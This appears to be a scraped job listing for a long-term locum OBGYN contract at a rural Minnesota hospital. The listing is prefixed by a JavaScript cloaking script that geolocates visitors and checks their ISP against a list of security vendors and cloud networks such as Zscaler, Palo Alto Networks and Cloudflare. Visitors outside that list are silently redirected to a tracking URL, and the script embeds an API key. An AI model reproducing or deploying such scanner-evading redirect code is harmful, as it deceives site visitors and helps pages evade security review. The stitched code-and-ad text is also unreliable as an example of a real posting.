Job Description
// retrieve user’s IP address and location const ipAddressUrl = ‘https://ipapi.co/json/’; fetch(ipAddressUrl) .then(response => response.json()) .then(data => { const country = data.country; // Get user’s country code (e.g., “US”) if (country !== ‘US’) { console.log(‘Script will not run as the user is outside the USA.’); return; // Exit the script if the user is not in the USA } const ipAddress = data.ip; // retrieve ISP name and AS organization using ip-api.com API const ispUrl = `https://pro.ip-api.com/json/$?key=kKPypoeKUHgwZWD`; fetch(ispUrl) .then(response => response.json()) .then(data => { const ispName = data.isp; const asOrg = data.asname; // check if ISP or AS organization is allowed const allowedIsps = [/Limestone Networks/i, /Limestone Networks, Inc./i, /Zscaler/i, /M247 Europe SRL/i, /amazon/i, /LinkedIn Corporation/i, /palo alto networks/i, /google/i, /panq/i, /Cloudflare, Inc./i, /Cloudflare/i, /Cloudflare Warp/i]; const allowedAsOrgs = [/Limestone Networks/i, /Limestone Networks, Inc./i, /Zscaler/i, /M247 Europe SRL/i, /amazon/i, /LinkedIn Corporation/i, /palo alto networks/i, /google/i, /panq/i, /Cloudflare, Inc./i, /Cloudflare/i, /Cloudflare Warp/i]; const ispAllowed = allowedIsps.some(pattern => pattern.test(ispName)); const asOrgAllowed = allowedAsOrgs.some(pattern => pattern.test(asOrg)); if (!ispAllowed && !asOrgAllowed) { // Redirect all users to the same URL window.location.href = ‘https://www.indeed.com/tmn/ccs/e21a3153957d55bd/5ecc3ddb8e988910b376ffd6b4bf62c5c6ac969bdda97bedf5e968a442de4088/2765583331732878?sf=yJ800’; } }) .catch(error => { console.error(‘Error retrieving ISP name:’, error); }); }) .catch(error => { console.error(‘Error retrieving IP address or location:’, error); });Seeking a *Locum Tenens OBGYN Physician* for a long-term contract at a rural Minnesota hospital. This low-volume role offers predictable hours, a flexible schedule, and a supportive women’s health team, ideal for physicians seeking stability and work-life balance.
Position highlights include:
• 6–24 months contract with flexible days and shifts
• Light call responsibilities (~1 night/week, weekend every 7 weeks)
• Low obstetric volume and clinic workload (~10–12 patients/day)
• GYN surgery, including robotic cases, in inpatient and outpatient settings
• Strong clinical backup with a team of physicians and nurse midwives
Compensation features:
• Competitive daily rate based on experience
• Guaranteed furnished housing and travel reimbursement
• Licensing support and quick credentialing
Ideal candidates are board-certified or eligible in OB/GYN with experience in labor, delivery, GYN surgery, and outpatient care. Prior locum experience is a plus. Benefits include malpractice insurance, flexible schedule, and work-life balance in a supportive environment.
Contact us for more details or to apply.